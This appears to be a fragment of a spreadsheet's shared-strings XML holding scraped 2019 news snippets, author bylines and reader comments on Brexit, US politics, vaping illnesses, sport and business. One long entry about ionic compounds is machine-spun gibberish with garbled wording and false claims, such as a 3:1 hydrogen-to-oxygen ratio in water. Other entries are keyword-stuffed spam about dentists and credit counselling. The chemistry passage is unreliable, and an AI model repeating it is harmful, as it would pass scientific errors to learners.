    <t>Cyclops dual suspension bike features: a steel frame, lightweight alloy rims, 18 speed shifting system, Shimano rear derailleurs and easy adjust quick release seat. Ages: 14+ years. Includes: 1 x Cyclops Dual Suspension Men's Bike 66cm Wheel size: 66cm Dual Suspension Men's bike 18 Speed shifting system Shimano rear derailleur Lightweight alloy rims Dual suspension Easy adjust quick release seat</t>
  </si>
  <si>
    <t>Two 16-year-old boys are charged in connection with the death of Mark Winchcombe in Neath. Read more? Click here</t>
  </si>
  <si>
    <t>Shona Martyn</t>
  </si>
  <si>
    <t>Margaret Atwood's The Testaments, publishing globally on Tuesday, is a timely literary page-turner.</t>
  </si>
  <si>
    <t>Relief organisations describe "apocalyptic" scenes and "lots more dead" in parts of the Bahamas after the most powerful storm on record to hit the islands floods neighbourhoods, renders hospitals unusable and upturns boats.</t>
  </si>
  <si>
    <t>Gordon will report to the Chargers on Thursday and put an end to his holdout, various news sources have stated. Source: Sports Business News</t>
  </si>
  <si>
    <t>When the Environmental Working Group reviewed more than 2,000 cleaning products, it found that more than half contained ingredients that irritate the lungs.</t>
  </si>
  <si>
    <t>The companies said in a press release that the platform, which will be used for mobility services, will use the distributed-ledger technology to enable secure and transparent in-vehicle payments. ZF, one of the world’s largest automotive suppliers, earlier this year already showed its Car eWallet during a press event in Germany. The blockchain-based payment system lets users make cashless payments for highway tolls, parking and electric charging from inside their vehicles. IBM said it will work with ZF and UBS, a Swiss financial services group, to synchronize and store information provided by users of the platform in a safe record. The companies predicted the platform and its safety features will transform e-commerce and create new opportunities for carmakers and service providers. The platform now under development is built on IBM’s blockchain technology and will be delivered via the IBM cloud. Various automotive companies have been testing blockchain technology as a means to offer safe and secure services around connected cars. But many of these projects are still in a trial phase. Nevertheless, automakers and suppliers expect blockchain to play a big role as they prepare to roll out more connected services and develop new business areas. A recent study by consultants Simon-Kucher &amp; Partners predicts the market for blockchain applications in the automotive industry will be worth €104 billion by 2030. Blockchain is also seen as a key enabler of digitalization by governments. This week, the German government published a concept aimed at promoting the technology as an essential building block of its strategy to modernize Europe’s biggest economy. Germany’s high-tech association, Bitkom, said the initiative can help speed up the implementation of blockchain. “Blockchain has the potential to completely turn conventional processes upside down and fundamentally change entire businesses,” said Bitkom President Achim Berg.</t>
  </si>
  <si>
    <t>Troy Media</t>
  </si>
  <si>
    <t>Greg Moreau is president and CEO of Chatters. Greg Moreau Tell me a bit about Chatters. What do you specialize in? Moreau: Chatters is the largest distributor and retailer of professional hair care goods in Canada, and the third largest in North America with a 60/40 business of retail to service. From products to service, our specialty is making customers “Style Happy.” We are always looking at ways to evolve with our clientele and inspire them to look good, feel good and do good with each style. Plus, we’re proud to show our customers that we are an environmentally-sustainable company that they can trust. In fact, every Chatters store is a certified Green Circle Salon, meaning we divert 95 per cent of our waste. What’s the history of the company? When did it start and where? How many locations currently? How many in Alberta and Saskatchewan? Moreau: Chatters is 100 per cent Canadian owned and operated. Chatters first began as a Regina-based retail salon concept founded by a Canadian hairdresser who opened his fourth location in Red Deer in the early 1990s. A few years later, two Canadian entrepreneurs from Red Deer and Regina partnered up to open Chatters salons in smaller cities and then began expanding into major Canadian markets. Fast forward to today – we now have 116 Chatters salons across Canada, including 41 locations in Alberta and 12 in Saskatchewan. We’re thrilled that this allows us to provide jobs for over 1,600 Canadians who are passionate about our brand and industry. What would you say differentiates yourself from competitors? Moreau: It’s the Chatters experience – we’re laser-focused on listening to our customers, better anticipating their needs, elevating our in-store experience and curating an assortment of the best beauty and hair care products in the world. This includes being first-to-market by introducing digitally native-brands to our extensive retail selection. Not only are we a reliable retailer for on-trend brands, we go a step further to meet our customer’s needs, including offering our in-house brand, Kenneth Bernard. The brand’s tools and products have been crafted based on listening to the feedback from our stylists and clients. We intend to keep the momentum going – we will react to our clients wants and needs and deliver the brand experience they know and love. What are the company’s plans for the future and expansion? Moreau: Our goal is to elevate our customer experience for both the online and brick-and-mortar consumers. With our most recent acquisition of Enviro Trends, we’re expanding our reach of styling perfect hair from Western Canada to new regions of Ontario. Our main vision for 2020 is to provide a seamless omni-selling experience by launching a brand-new POS system and revamping our loyalty and membership programs. Plus, we’re looking forward to announcing additional store acquisitions and different program launches. There’s going to be plenty of great hair days over the coming months. What trends are you seeing in your industry and what are consumers looking for in the hair salon business? Moreau: Millennials are the trend-setters and are looking for recognizable brands, particularly ones that are sustainable and tailored for their hair type. We noticed significant traffic increases on our website from this particular demographic shopping for our globally-recognized brands specifically. Of course, one trend that’s here to stay is the fact that the most loyal relationship consumers have in retail is the one they have with their stylist! That defines the essence of Chatters. Our clients trust our team for professional products and services. They continue to be our motivation to strive for the most inclusive shopping experience to suit any style and any hair-care need. Interviewed by Mario Toneguzzi, a Troy Media business reporter based in Calgary. © Troy Media The views, opinions and positions expressed by columnists and contributors are the author’s alone. They do not inherently or expressly reflect the views, opinions and/or positions of our publication. The post Plenty of great hair days at Chatters appeared first on West-Central Cross Roads.</t>
  </si>
  <si>
    <t>Should the stars guide you when life is leading you down all sorts of dark and dangerous alleys?</t>
  </si>
  <si>
    <t>A third person has died from a severe lung illness linked to the use of a vaping device. The death was confirmed on Friday by the state of Indiana, which said that an “individual over the age of 18” had died, but provided no additional information about the patient or case, citing privacy laws. Two other people — one in Illinois, the other in Oregon, both of whom were adults — have died from what appears to be the same type of illness, health officials in those states have said. State and federal health officials are scrambling to find a cause, possibly a particular chemical or adulterant contained in some vaping products. To date, more than 200 cases of the mysterious illness have been reported in 25 states. A news release issued by the Indiana Department of Health said that the state is investigating 30 cases in which people have become sickened after vaping; the majority of patients are between the ages of 16 and 29. The syndrome has afflicted otherwise healthy people. What looked like a few scattered cases in mid-June has become a full-fledged and widespread public health scare, leaving people ill in roughly two dozen states, some so severely that they have been placed on ventilators. Those afflicted typically wind up in emergency rooms with shortness of breath after several days of flulike symptoms, including high fever. The state of New York, where 34 people have taken ill, said on Thursday that vaping samples from eight of its cases showed high levels of a compound called vitamin E acetate. Investigators there are focusing on the possibility that the oily substance might be playing a key role in the illness. However, some of the more than 100 vaping samples being tested by the federal government did not prove positive for vitamin E acetate, so that compound remains only one of many possible causes of the heavy lung inflammation. Source link</t>
  </si>
  <si>
    <t>It's not the concept that's the problem, it's the execution, says James Anderson, who trains teachers in mindset theory.</t>
  </si>
  <si>
    <t>Tom Rabe</t>
  </si>
  <si>
    <t>The NSW government will spend $75 million to spur private investment in renewable energy.</t>
  </si>
  <si>
    <t>More than 450 schools are in the red, amid continued warnings about financial pressures. The post NI schools’ £62m overspend highlights ‘perilous’ financial situation appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>Patrik Walker</t>
  </si>
  <si>
    <t>The Jacksonville Jaguars were hosting the Kansas City Chiefs in Week 1, and it was a game filled with as much beauty as there was terror. In the end, the Chiefs prevailed 40-26. The Chiefs got off to a blazing start when Patrick Mahomes hit wideout Sammy Watkins for a 68-yard catch and run for a touchdown. He left the game briefly with an apparent ankle injury, but was re-taped and re-entered the game to continue his dominance en route to 313-yard, two touchdown first half that includes a near-perfect passer rating of 152.1. Things were much darker for the Jaguars, though, because after witnessing Nick Foles make his Jacksonville debut with a stellar 35-yard TD pass to D.J. Chark, they were then forced to rush him into the X-ray room for evaluation and immediately ruled him out of</t>
  </si>
  <si>
    <t>Gov. Phil Scott of Vermont on Thursday endorsed the impeachment inquiry against President Trump, becoming the first Republican governor to do so. Mr. Scott’s announcement, at a news conference, was carefully calibrated. He did not say that he believed Mr. Trump should be impeached, much less removed from office. He said only that Congress should examine the full whistle-blower report, and that it was appropriate for the House to proceed with the inquiry that Speaker Nancy Pelosi announced on Tuesday. “I think the inquiry is important, yes, and where it leads from here is going to be driven by the facts that are established,” he said. His remarks at the news conference mirrored a statement his office released beforehand, in which he said he supported the opening of an inquiry but also added: “Most realize impeachment is a very serious issue and should not be taken lightly or abused. Congress has a solemn responsibility to every American to fulfill its role in our government system of checks and balances. It is my hope they will be objective and let their work take them wherever the facts lead, and they will be transparent with the American people every step of the way.” A spokeswoman for Mr. Scott said the governor was not available for an interview Thursday afternoon, but she emphasized the distinction between supporting impeachment and supporting the inquiry. “As the governor has said, he’s not predetermining the outcome of the inquiry, which could find there is no cause to move forward,” the spokeswoman, Rebecca Kelley, said in an email. Yet this stance, limited as it is, is noteworthy when most other Republicans are circling the wagons around the president. Even other moderate Republican governors, like Charlie Baker of Massachusetts and Larry Hogan of Maryland, have stopped short of endorsing the impeachment inquiry, though Mr. Baker did call on Congress to investigate Mr. Trump’s actions. “It’s a deeply disturbing situation and circumstance, and I think the proper role and responsibility for Congress at this point is to investigate it and get to the bottom of it,” Mr. Baker said in Boston on Thursday. He did not use the word “impeachment” or directly address Ms. Pelosi’s decision to open a formal inquiry. Based on public statements and a New York Times survey, not one of the nearly 200 House Republicans supports the impeachment inquiry. (Fifty-five have said nothing either way.) Representative Justin Amash of Michigan, a former Republican who left the party in July and is now an independent, is the only non-Democrat in the House who supports it. In news conferences and on Twitter, top Republicans have staunchly defended Mr. Trump and accused Democrats of putting partisanship above country. Mr. Scott has often departed from the party line, though, especially when it comes to Mr. Trump. He denounced the president’s calls in July for four House members — all women of color and all United States citizens, three of them native-born — to “go back and help fix the totally broken and crime infested places from which they came.” He has criticized Mr. Trump’s climate, trade and immigration policies, and, almost exactly a year ago this week, urged a more thorough investigation of sexual assault allegations against Brett M. Kavanaugh before the Senate confirmed him to the Supreme Court. Last year, Mr. Scott also defied fellow Republicans by signing a package of gun control measures after the massacre in Parkland, Fla. He nonetheless won re-election by a large margin in Vermont, which is one of the nation’s bluest states. Jonathan Martin contributed reporting. Source link</t>
  </si>
  <si>
    <t>Louise Rugendyke</t>
  </si>
  <si>
    <t>In the past 10 years she has not so much blazed a path but set it on fire with a style that veers wildly between the bleak, black and absurd.</t>
  </si>
  <si>
    <t>Of electricity whenever ionic ingredients break down in h2o. Each ravenscroft is made up of a great unspecified range of ions: a figures tend to be massive: just a Zero.5 gary crystal clear of sodium chloride is made up of about Just one times Ten Twenty two ions. Atoms which may have reasonably few valence electrons, for example alloys, shed electrons and they are electropositive. Potassium oxide, or perhaps K2O, is another example of a ionic ingredient. Essentially the most stable agreement on an atom would be to currently have nine valence electrons included in the outermost level of energy. Today, consider just what exactly that will strength will be – I think you will do not forget that electrical power is only the action involving electrons in the metallic (or even in a different place). H + acceptors like get redirected here OH ( blank ) as well as U 2- tend to be classed when basics. (This is because the weird properties of water, however it’s an alternative story an alternative occasion). Within ionic crystalline colorings with this form, a electrostatic forces associated with interest involving opposing rates and repulsion involving identical prices orient the particular ions within such Thus it wants to give away most of these electron to own royal fuel construction and fulfill the octet principle. A ionic chemical substance is usually an excellent shaped from a selection of changing cations and also anions. When NaCl melts with drinking water, the actual complete waters substances sort solvation buttocks around the dissolved ions. chem. chemical abuse Ў chemical mechanism Chemakuan Chemical Toxins as well as Canine Give food to Division Family table sea salt can be an example of the following : when you look at a sea gem, it’s likely you will be able to see which appears to be like a tad ‘like any dice. It requires lots of vitality to get ionic fees connected with others. Fresh air, nonetheless, is due to a person gleam about by which we discovered swimming pool water, so that it is going to achieve a pair of electrons. There’re shades at room temperature That is completely different from covalent relationship, where electrons usually are embraced simply by atoms, growing online connections. however for this sort of open up query you may bring virtually any combined a group 1 part and mix the item by using any collection 7 Methane as well as water are made associated with compounds; that is certainly, they are molecular chemical compounds. ?? My spouse and i manufactured this won’t of buying all of my college textbooks, If only I had put together the choice of renting all of them. Much needed oxygen is often joined with numerous cations to form a big number of Не понравилось? Yet one optimistic and one damaging will probably contentedly join collectively for making a great ionic compound. This is not the same as covalent relationship, during which electrons are usually discussed simply by atoms, creating directional ties. Think on the pairing connected with ions including a couple of tavern heat. Ions have got unique homes in the basic kinds of your atoms. Table marine is undoubtedly an demonstration of a good ionic mixture. The ratio of hydrogen for you to oxygen within waters is obviously 3:1. Compounds may be decomposed chemical within their element components. A next typical attribute with connection as well started to be visible in the beginning involving chemistry. Potassium is with the initially grin, so it will lose one electron you are able to online good ask for. Even though the number of protons can never adjust for just about any atom, because will mean you have a contrasting ingredient, from time to time the volume of electrons does indeed switch. These kinds of chemical substances, which may be shown to incorporate material cations along with Deborah 3? anions Probably the most constant design for the atom is usually to currently have eight valence electrons in the outermost level of energy. You’re on the roll. Carry on the great perform! Bronsted Lowry acids/bases are generally elements that will donate/accept + ions. When NaCl melts within drinking water, the particular polar water substances type solvation seashells throughout the wiped out ions. H + acceptors for instance Also ( blank ) and I 2- will be classed as facets. This is actually a review of days gone by and share nomenclature or perhaps labeling promotions to get ionic compounds The moment a good atom benefits as well as sheds electrons, it possesses a fee as well as gets a strong . Properties with ionic bond Samples of polar solvents will be water, methanol, and also formamide. Solution: i) Both ammonium in addition to sulfate will be polyatomic ions, just as before, that element is classed as being an ionic substance. Each amazingly has an unspecified amount of ions: your numbers usually are tremendous: also a 2.Five gary crystal clear connected with sea salt chloride includes with regards to Just one x 12 25 ions. In it is finest type, ionic connection is just not online. 3:Fifty three Structure associated with Ionic Compounds Chemical Structure Distribution Chemical Makeup Distribution Water is a new awful boss. Ionic compounds are unique given that they kind lattice or even crystalline properties. Each atom is different which is produced from a selected amount of protons, neutrons, plus electrons. The volume of electrons them will take, would be the range of negative ask for the idea profits. Sodium in addition to swimming pool water ions combine to style sodium chloride, or perhaps NaCl. Ionic includes are very powerful, which makes them challenging to sink. Yet again, it’s because of precisely how they will adhere collectively. Текст видео Potassium influences initially grin, so that it will mislay one electron and also a goal good cost. You could have noticed that compared with your sea chloride example, that has a person sodium ion per swimming pool water , on this occasion there’s two potassium atoms each fresh air. Ionic substances are quite difficult and extremely breakable. The other negative and positive charges in the ions store together within ionic provides, creating ionic compounds, that are what exactly they will seem like: substances made of ions. Sodium cuts a electron to receive beneficial ask for in addition to chlorine accepts of which electron to realize a bad demand. Example Several: Offer the molecular system associated with ammonium sulfate. Two-element substances are generally ionic when a single component is really a material and yet another is actually a non-metal. A few of ionic pollutants, while the particular dryer struck the water, many people have zapped . What will be Ionic Materials? Ions possess a fee mainly because electrons are usually lost and also gained around developing a strong ionic bond. Ionic materials are available while big ravenscroft lattices. Ionic chemical substances exist while gigantic crystal clear lattices. Typically, the quantity of protons and also electrons is the same on an atom. Sea plus swimming pool water ions combine efforts to sort sodium chloride, or maybe NaCl. Solutions of Ionic Compounds To break this good and bad expenses separated, it requires a tremendous number of strength. The kind of provides having aspects alongside one another in a mixture could vary: a couple prevalent sorts usually are covalent connections as well as ionic securities. Further disparities among chemical substances as well as combos are listed in the phrase mixture. Right here, water’s much needed oxygen atoms, each using a moderate detrimental impose, solvate the actual Na + Another example of ionic bond is the configuration with magnesium mineral chloride by relocating 2 electrons from a magnesium vitamin atom to two swimming pool water atoms. A pair of positive or even a couple negative ions will not sign up for with each other because they have the similar fee.</t>
  </si>
  <si>
    <t>MORNING BRIEFING: A 3.1 earthquake strikes Berridale and is felt in many surrounding towns, with locals reporting shaking homes; while police lay additional charges against a former swimming coach as part of investigations into historical sexual assaults.</t>
  </si>
  <si>
    <t>Christian Nicolussi</t>
  </si>
  <si>
    <t>The Roosters and NSW No.1 clinched a second successive Brad Fittler Medal after a stunning State of Origin series including the game-three match winner.</t>
  </si>
  <si>
    <t>Heavy rainfall from Tropical Depression Imelda caused severe flooding in parts of southeastern Texas on Thursday morning, September 19, as seen in this footage, captured in Mauriceville, a town on the Texas/Louisiana border. The National Weather Service issued a flash flood emergency for areas across southeastern Texas. 12 News reported that high-water rescues were underway in Jefferson County, with the Chambers County Sheriff’s Office saying over 1,000 people had asked to be rescued. Footage here shows the extent of flooding in Mauriceville, with roads almost impassable to vehicles. Credit: @macy_malin via Storyful</t>
  </si>
  <si>
    <t>The Conservative Woman</t>
  </si>
  <si>
    <t>YESTERDAY’s story ‘Breaking news: Boris sacks 21 MPs’ prompted many comments, though none with any sympathy for the rebels. Here is a selection of excerpts: boomslang74 wrote: Alternative title: ‘Breaking news: Boris sacks 21 anti-democratic, traitorous, Remainer, pretend Conservatives. True conservatives all over the UK rejoice’. youhavenewmail wrote: What a chasm, what a gulf of difference between 3 September 1939, when Britain declared war on Germany after their invasion of Poland, and 3 September 2019, when MPs effectively declared war on their own government and sought a surrender to the EU. However, we can also remember the date of the ending of the Battle of Britain, 31 October 1940. Perhaps, suitably and fittingly, the Battle of Brexit could still end on 31 October . . . Cynthia wood replied: Agree about end of Brexit on October 31. It is Nemesis day for all and what happens, or does not happen, on that fateful day will control British politics for another decade. BJ’s total commitment to it, again at the despatch box yesterday, and now the commitment of a purged Tory party, not to mention TBP and the expectations of the growingly aroused British public all move inexorably to that date. Granted, what happens now and in between will be most interesting. wiggiatlarge wrote: Judging by the smirk on Theresa May’s face during all this she would have loved to have crossed the floor of the house and joined them, after all her rhetoric was just that rhetoric, she never had any intention of leaving the EU in a meaningful way, in the real world she would have been sacked for incompetence. B1956 wrote: A cull of Tories, but will they be replaced by conservatives, I wonder? Scaroth wrote: Boris wields the butcher’s knife for a second time. Meanwhile the Labour Party – the official Opposition – is seemingly more interested in taking No Deal off the table than taking over the government. Really don’t want to let us have a say, do they? My guess is this has been worked out in advance by Cummings and Boris, so as to maximise anger against the treacherous MPs who clearly now serve a foreign power. There’s a word for that. Dacorum wrote: As Michael Howard said on Radio 4 today, Boris had no choice but to remove the whip and expel the pro-EU rebels because if there was a General Election and he won a majority, the same rebels would oppose him and therefore threaten his majority. They therefore had to be kicked out. That is the hard political reason but I’m delighted they have been kicked out as I don’t regard those who are pro EU and wish to be governed by the EU are conservatives in any sense of the word. Michael Howard could also have said that, if they had been allowed to stand, the public could not be certain what the Conservative Party was campaigning for in the election which would cost them the votes of countless Leavers. Steve Sidaway 6 hours ago Wonderful! 21 fewer Fake Tories who can either stand as Independents and be obliterated, or join the Lib-Dums – and be obliterated . . . Poliorketes wrote: This is excellent news. The hardline Remainers in the party played right into Johnson’s hand, and by showing when he makes a threat he follows through is no bad thing for the discipline of those remaining in the party. I notice quite a few of the usual suspects – Djanogly, Spelman, Alan Duncan – balked. Nor were there resignations from the likes of Rudd or Morgan, so that’s their Remainer credentials blackened. Those sacked were never going to vote for any genuine Brexit, no matter what disingenuous lies they told about how they were opposed only to no-deal. The likes of Gauke knew the crap deal accepted by May wasn’t leaving the EU, but a holding pattern to allow the UK to rejoin after 2020. Hammond et al were outplayed, and this is only the first move of the game. They’ll find Johnson a rather different opponent to May. John Birch wrote: It’s odd that in parliament a majority counts as a win, but not apparently in a referendum. The post Readers’ comments special: Good riddance! appeared first on The Conservative Woman. The post Readers’ comments special: Good riddance! appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>Collingwood falls short of pulling off an amazing comeback victory in the preliminary final, allowing the Giants to reach their first season-decider.</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</si>
  <si>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China warns U.S. won't get trade benefits if tariffs implemented as… by USA Consumer Credit Counseling, Felipe Escobar on Saturday 14 September 2019 09:17 AM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China warns U.S. won't get trade benefits if tariffs implemented as… Saturday 14 September 2019 09:03 AM UTC-05 | Tags: consumer-credit-counseling-service http://creditcounselingconsumer.home.blog/staten-island-new-york-consumer-credit-counseling-service-888-551-1270/ China warned the United States on Sunday that any agreements reached on trade and business between the two countries will be void if Washington implements tariffs and other trade measures, as the two ended their latest round of talks in Beijing. Tags: Compton, California Consumer Credit Counseling Service | (888) 551-1270 via China warns U.S. won't get trade benefits if tariffs implemented as… September 14, 2019 at 08:54AM Copyright © September 14, 2019 at 08:54AM Tags: consumer-credit-counseling-service</t>
  </si>
  <si>
    <t>Hugo Gye</t>
  </si>
  <si>
    <t>John Bercow has gone to war with the Government warning ministers will be no better than bank robbers or knife criminals if they try and force through a no-deal Brexit. The Commons’ speaker pledged to help rebel MPs secure an extension to the Brexit deadline if the Government seeks to ignore the law which aims to rule out no-deal. And he launched a vociferous attack on ministers who have refused to rule out dodging the terms of the legislation in order to deliver Brexit on 31 October. Boris Johnson has repeatedly ruled out asking the EU to delay Brexit in the event of a no-deal scenario, as is now required by the law. Delivering a lecture in London on Thursday night, Mr Bercow predicted “yet more drama” in the House of Commons as the Halloween deadline draws closer. He said the only three acceptable outcomes would be leaving the EU with a deal approved by MPs, delivering no-deal with Parliament’s permission, or seeking a three-month delay as mandated by the so-called Benn bill. Commons ‘creativity’ Boris Johnson says he will not request a delay to Brexit (Photo: Getty Images) The Speaker, who is stepping down next month, added: “Not obeying the law must surely be a non-starter. Period. What conceivable moral force do the public’s representatives have in seeking to tackle anti-social behaviour; in prosecuting with greater vigour and imagination and relentlessness the fight against knife crime; in arguing that the state must protect itself against all forms of nefarious illegality, if we are to treat for a moment that it might be in order in the name of some higher cause to disregard a law enacted by Parliament? “One should no more refuse to request an extension of Article 50 because of what one might regard as the noble end of departing the EU as soon as impossible, than one could possibly excuse robbing a bank on the basis that the money stolen would be donated to a charitable cause immediately afterwards.” Vowing to tear up Commons convention in order to keep the Government in check, Mr Bercow concluded: “If we come close to being there, I would imagine that Parliament would want to cut such a possibility off and do so forcefully. “If that demands additional procedural creativity to come to pass, it is a racing certainty that this will happen and that neither the limitations of the rulebook nor the ticking of the clock will stop it doing so.” The Speaker, who has repeatedly clashed with ministers, is leaving his post on 31 October. Labour MPs Lindsay Hoyle and Harriet Harman are the favourites to replace him. More politics MPs 'will block attempts to call an election until Brexit is resolved' Brits should spend no more than 35 hours at the office, Labour to say European Parliament head: You can't have Brexit deal without backstop Babcock named as preferred bidders for Royal Navy frigates Boris Johnson: I absolutely did not lie to the Queen Kwasi Kwarteng says 'many people are saying' judges are biased The post John Bercow says ministers will be like ‘bank robbers or knife thugs’ if they ignore law to deliver no-deal Brexit appeared first on inews.co.uk. The post John Bercow says ministers will be like ‘bank robbers or knife thugs’ if they ignore law to deliver no-deal Brexit appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>Vietnam Dental Services Industry Revenue is Expected to Reach About USD 435 Million by 2023: Ken Research – As a result, dental services are gaining traction in the country and further anticipated to grow in the near future. Vietnam a Hub for Dental. Dental Care Services (Prosthodontics, Endodontics, Best Cosmetic Dentists in Vaughan, ON – Marketplace Dentistry, DH Smile Center Dentistry, Maple Dental Centre, Vellore Corners Dentistry, Rio Dental Centre, Dentistry On Thornhill Woods, 720 King West Dental, Woodbridge Vaughan Dental, Rosedale. . Dental Implants &amp; Prosthetics Market Value to Assure $12.7 Bn by 2023 –. of dental implants and prosthetics is expected to increase in the near future, owing to the rise in prevalence of dental. Toronto cosmetic dentistry: Teeth whitening, Invisalign, and veneers are three options from Dr. Sabharwal for transforming your smile. Call 844-432-0770. Find the best Cosmetic Dentists on Yelp: search reviews of 235 Vaughan businesses by price, type, or location. Yelp Find Near Cancel Log In Sign Up Restaurants Home Services Auto Services More Write a Review Health &amp; Medical Dentists Cosmeti. Dr. Jim Ellis DDS Dentist – Ogden Is The Cosmetic Dentistry In Ogden – The dentists at Dr. Jim Ellis DDS Dentist – Ogden offer each patient the personalized care and attention needed to ensure. Friendliest Dentist In Vaughan Ontario Some of Angkor’s CSR projects include a community health center, containers of medical equipment, education programs, clean. Liberty Suites Hotel – I stayed at this property and it was a great choice. Hugh suites, very spacious, clean, and absolutely breathtaking. The staff is just the friendliest and welcoming. Underground parking can be a little hard Cosmetic Dental Clinic Near Vaughan Cosmetic Dental Clinic Near Vaughan Find the best Cosmetic Dentists on Yelp: search reviews of 235 Vaughan businesses by price, type, or location. Yelp Find Near Cancel Log In Sign Up Restaurants Home Services Auto Services More Write a Review. Cosmetic Dentistry Vaughan Emergency Dentistry Vaughan Invisalign® Teeth Whitening Dental Implants Root Canal Treatment. The Whatever your reason is, it’s time to find you a great oral health dentist that can help your teeth and your gums. Keep. Most Popular Dental Clinic Near Vaughan Goodbye, perhaps, to legal aid clinics. where most students leave after classes, will be affected differently than those. Mom seeks birthday cards for son with rare skin disorder: ‘His life depends on this’ – Most types of epidermolysis bullosa, sometimes referred to as “butterfly skin,” are inherited, according to the Mayo Clinic. It was wet List of the best Cosmetic Dentistry in Woodbridge, ON. Get customer reviews , prices, contact details , opening hours from Woodbridge, ON based businesses with Cosmetic Dentistry keyword. Cosmetic dentists in Vaughan will provide help If you are not happy with your teeth! We provide top-quality cosmetic dentistry and orthodontics services and are willing to get your. Best Dentists in Woodbridge, Vaughan, ON – Woodbridge Vaughan Dental, Venditti Ben Dr Dentist, Innovation Drive Dental, Today's Family Dental Centre, Woodbridge Dental Arts, Sunny Day Dental, Pomposa Frank Dr Dentist, Roysun Dental Centre, .</t>
  </si>
  <si>
    <t>Stellar Asset Management is delighted to announce the successful acquisition of Paultons Golf Centre (pictured) from previous owners, Crown Golf, on behalf of its Growth Portfolio Service investors. With an already strong portfolio of hotel and golfing resorts including, Murrayshall and The Marine Hotel in Scotland as well as a number of Holiday Inn Express properties around the country, Stellar’s latest acquisition marks another bold venture into the vibrant leisure market as the company once again seeks to unlock the business potential in another outstanding facility. The 150-acre site, located on the edge of the New Forest in Hampshire, boasts a 24-bay driving range, 18-hole course and a 9-hole par three course. In addition to its extensive golfing facilities, Paultons Golf Centre offers an idyllic location for weddings, events and private functions. Working in partnership with Ben Blackburn Golf, the site will undergo a major refurbishment, with the aim of modernising the clubhouse, event space and driving range. Taking inspiration from current trends in the United States, the driving range will be transformed, in partnership with TopTracer, into an interactive family, sports and entertainment space providing full-service food and beverages, sports bars and a multi-media private event space. Toptracer Range delivers the same ball-tracking technology that traces the shots of the game’s best players on TV. The new range will be equipped with Toptracer’s market-leading technology to offer a fun, engaging, tech-driven experience that will appeal to seasoned players, range rivals, friends, family members and first-time golfers. The new TopTracer Range will be installed on the 23rd September and will be fully operational on Friday 29th September, with an official launch event planned Friday, 18th October. Jonathan Gain, Chief Executive of Stellar Asset Management, commented: “We are incredibly excited to welcome Paultons Golf Centre into our portfolio of properties and are looking forward to enhancing the potential of the golf course, clubhouse facilities and driving range for the benefit of our members and visitors.” “The US market has seen an explosion in upmarket golf driving ranges. Given that the UK tends to follow US trends, this is an exciting space for us, and the popularity of both courses to members and public offers great potential for our investors.” Paultons Golf Club https://paultonsgolf.co.uk/ Stellar Asset Management https://www.stellar-am.com Source link</t>
  </si>
  <si>
    <t>The family were having a go - working, paying taxes and actively participating in their community. But they don’t get a go. How bad is that?</t>
  </si>
  <si>
    <t>British Prime Minister Boris Johnson and Irish Prime Minister Leo Varadkar sat down for Brexit talks on Monday, but both said a breakthrough was not likely immediately.</t>
  </si>
  <si>
    <t>This is our match preview ahead of Manchester United's Europa League clash with Astana at Old Trafford including team news and line-up.</t>
  </si>
  <si>
    <t>Canberra Raiders forward Hudson Young has been handed an eight-week ban after he was found guilty of dangerous contact, and Geelong Cats coach Chris Scott unfazed by the criticism coming his way following the Cats’ loss to Collingwood. Image: Getty</t>
  </si>
  <si>
    <t>Nigel Farage said he wanted to maintain the highest possible standards within the Brexit Party The post Brexit Party MEP has whip withdrawn over ‘unacceptable’ behaviour appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>Senior Class Trip 2019 The post Senior Class Trip 2019 appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>It’s all square, Europe 8 – USA 8 after day two of the Solheim Cup at Glenealges, so a thrilling day of singles matches lies ahead to decide the winning team. Unlike the first day of the Solheim Cup, players had to contend with winds gusting over 30 miles an hour over the PGA Centenary Course at Gleneagles today. Europe began the second day with a slender lead, 4½–3 ½, but that lead soon disappeared when sisters Jessica and Nelly Korda continued their scintillating form from the previous day to beat the undefeated Spanish and English pairing of Carlota Ciganda and Bronte Law in a convincing fashion, 6&amp;5. Anna Nordqvist and Anne van Dam made a fast start against USA’s Morgan Pressel and Marina Alex and were 3up after 8 holes, but the tide changed dramatically as the Americans responded with four straight birdies to edge ahead 1up. The US pair kept the momentum going to move to three up with three holes to play, and whilst Europe pulled a hole back on the 16th, the Americans clinched victory with a par on the following hole. Charley Hull and Azahara Munoz, who partnered each other to European success on the opening foursomes session, matched this with a 4&amp;3 win over Danielle Kang and Meghan Khang. Similarly, the winning European pairing of Georgia Hall and Celine Boutier impressed again, beating Lizete Salas and Amy McDonald 3&amp;2, to complete the foursomes on level footing, 2-2, and keep the Europeans clinging onto their one point lead. In the afternoon fourballs, Suzann Pettersen and Ann van Dam led team Europe, geeing up the crowd on the first tee, and whilst the European pair never got their noses in front of Britany Altomare and Annie Park, it was a closely fought match that van Dam extended to the 18th hole after securing a lengthy putt for a half, before the Americans won 1 up after making par on the final hole. Europe’s impressive pairing of Georgia Hall and Celine Boutier versus Ally McDonald and Angel Yin found themselves 4 down after 7 holes, but they made a gallant comeback to level the match on 16. A winning par putt from Hall took them to 1up on the par-3 17th and Boutier’s birdie on 18 secured a 2up victory. A point was shared between Jodi Ewart Shadoff and Caroline Masson and Lexi Thompson and Marina Alex. This was a see-saw match with the lead changing between both pairings, but never more than 1up. Europe’s Caroline Masson had a good chance to seal the match with a birdie putt on 18, but there was a deep sigh from Captain Catriona Matthew and fellow players looking on as Masson’s putt slid past. The final match out on the course tippped in the American’s favour as Lizete Salas and Danielle Kang beat the Spanish pairing of Carlota Ciganda and Azahara Munoz 2up. At 8-8, it should be a thrilling final day with 12 singles matches to decide the contest. Europe require 14½ points to win the trophy and the USA need 14 points to retain it. Image: Getty Images UK Sports Minister Signs Women in Golf Charter – READ MORE [embedded content] The post Europe 8 – USA 8 – Exciting Day Ahead at Solheim Cup appeared first on Women’s Sport Network.</t>
  </si>
  <si>
    <t>Japanese Hmong Dictionary – travel dictionary to translate Japanese to Hmong. Click on the list to show Japanese or Hmong synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading Japanese Hmong Dictionary →</t>
  </si>
  <si>
    <t>Emma Koehn</t>
  </si>
  <si>
    <t>A senate committee has urged caution on a plan for reporting business tax debts to credit authorities.</t>
  </si>
  <si>
